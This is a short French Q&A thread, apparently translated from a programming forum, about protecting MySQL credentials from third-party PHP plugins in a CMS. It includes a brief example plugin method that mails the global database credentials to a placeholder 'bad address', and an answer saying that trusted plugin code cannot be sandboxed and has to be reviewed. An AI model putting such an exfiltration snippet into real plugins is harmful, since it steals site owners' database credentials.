J'ai une question qui me trotte dans la tête depuis longtemps. Je suis sur un projet CMS et je ne sais vraiment pas comment faire: Je veux que ce cms soit modulable en utilisant un système de plugin, rien de difficile jusqu'à maintenant. Eh bien, j'ai maintenant cette question comment puis-je protéger une variable/constante comme mot de passe mysql de l'utilisateur admininstrator? Par exemple, dans le fichier settings.php j'aiProtéger les variables contre le vol en php
$mysql = array("user" => "admin"...);
Comment puis-je faire une classe de ne pas le lire? Une classe simple (plug-in) pourrait faire
class myplugin extends plugin_container {
function badfunction() {
mail("my bad address", "data stolen", $GLOBALS["mysql"]);
}
Un plug-in simple, de cette façon, peut voler données sensibles de l'utilisateur. Comment puis-je réparer cela ?
Vous ne pouvez pas, et il est inutile d'essayer de trouver une solution * technique * à cela. Si vous faites confiance au plug-code pour l'exécuter dans votre application, il a forcément accès à l'environnement actuel. Vous devriez passer en revue le code de tiers pour vous assurer qu'il n'essaie pas de voler des informations d'identification ou de compromettre autrement votre serveur. – meagar